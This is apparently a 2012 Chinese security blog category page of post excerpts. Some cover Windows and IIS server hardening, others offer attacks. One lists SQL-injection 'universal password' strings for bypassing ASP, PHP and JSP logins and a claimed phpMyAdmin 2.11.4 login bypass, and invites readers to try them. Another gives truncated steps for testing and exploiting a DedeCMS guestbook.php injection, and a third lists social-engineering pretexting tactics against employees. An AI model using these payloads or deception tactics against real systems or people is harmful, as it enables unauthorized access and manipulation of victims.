当前目录: 网络安全
服务器安全配置之Wscript.shell利弊

2012年12月16日  网络安全   

Wscrip.shell是Windows自带的组件.因为它过于强大。所以经常被黑客加以利用。它可以调用系统内核运行的DOS墓本命令,与此对应的还有三个危险组件.它们分别是:FSO,Shall.Application, WScript.Network.这几个组件的存在与否直接关系到黑客是否能 成功攻陷你的服务器。所以,在不需要这些组件的情况下.我们应该尽最避免这些组件的存在。Wscrpp.shell可以通过在运行里输入: regsvr32/。c:\winnt\system32\wshom.ocx命令来卸载, 而 Shell.application组件可以通过在运行里输入: regsvr32 /u c:\winnt\system32\shell32.dll命今来卸载。

万能密码汇总

2012年12月16日  网络安全   

asp aspx万能密码 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11:   1 or '1'='1'=1 12:   1 or '1'='1' or 1=1 13:   'OR 1=1%00 14:   "or 1=1%00 15: 'xor 16:   用户名   ' UNION Select 1,1,1 FROM admin Where ''='     (替换表名admin)   密码 1 PHP万能密码 'or 1=1/* jsp 万能密码 1'or'1'='1 phpmyadmin 2.11.4万能密码漏洞 phpmyadmin 2.11.4 phpmyadmin 2.11.3 两个版本都有此漏洞 我去测试了一下 确实可以用。。。 你们可以试一下 只需要输入账号  密码不需要输入 利用代码如下: ‘localhost’@'@”

dedecms 最新sql注射漏洞利用guestbook.php

2012年12月12日  网络安全   

漏洞成功需要条件: 1. php magic_quotes_gpc=off 2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。 怎么判断是否存在漏洞: 先打开www.xxx.com/plus/guestbook.php  可以看到别人的留言, 然后鼠标放在 [回复/编辑]   上 可以看到别人留言的ID。那么记下ID 访问: 1 www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=存在的留言ID 提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了 跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证 明漏洞无法利用应为他开启了 php magic_quotes_gpc=off 如果没有修改成功,那留言ID的内容还是以前的 那就证明漏洞可以利用。 那么再次...

删除不必要的IIS组件

2012年11月26日  网络安全   

最少的服务往往带来最大的安全,一般的Web服务器只需安装的最小组件选择是:Com Files、IIS Snap-In. WWW Server组件。至于Indexing Service,FrontPage 2000 Server Extensions, Internet Service Manager这几个组件非常危险的,没有必要的话完全可以不 安装。在实际的网站服务器设置中,.可以根据网站功能的需要,将不必要的IIS组件卸载。 下面介绍如何卸载不必要的IIS组件: (1)单机任务栏菜单“开始”--“控制面板”--“添加删除程序”,打开“添加或删除程序”。单击对话框左侧的“添加/删除win组件”按钮,打开windows组件安装对话框。 (2)选中“internet信息服务(IIS)”然后单机“详细信息”按钮,在internet信息服务中将不必要的IIS组件的勾去掉就行了之后点确定。

黑客技术之社会工程学

2012年11月8日  网络安全   

社会工程师的攻击手法也各不相同,以获取无害信息来说,可 以伪装成公司同事然后像其他人索取,或者收集整理公司的垃圾等。不同的攻击方法有不同的实施过程及特点,可能针对上述的某一种人性弱点也可能针对多个弱点,一些常见的社会工程学攻击技巧如下: 1)冒充成不引人关注的职业,潜入攻击目标所处的工作区; 2)攻击新员工,通过假冒权威、寻求帮助、建立认同感等各种策略套取无害信息,甚 至作为攻击跳板的访问权; 3)伪装身份,在获取目标部分信息后,通过伪装建立起信任,通过对话获取更敏感信 息; 4)十度隔离法,利用关联层层渗透,对攻击目标逐步接近; 5)正面攻击,直截了当地开口要求所需信息,这种看似荒谬不可能实现的攻击方式, 借助于一系列步骤和精心策划的借口托辞,往往也是可以从看似不可能实现的转变...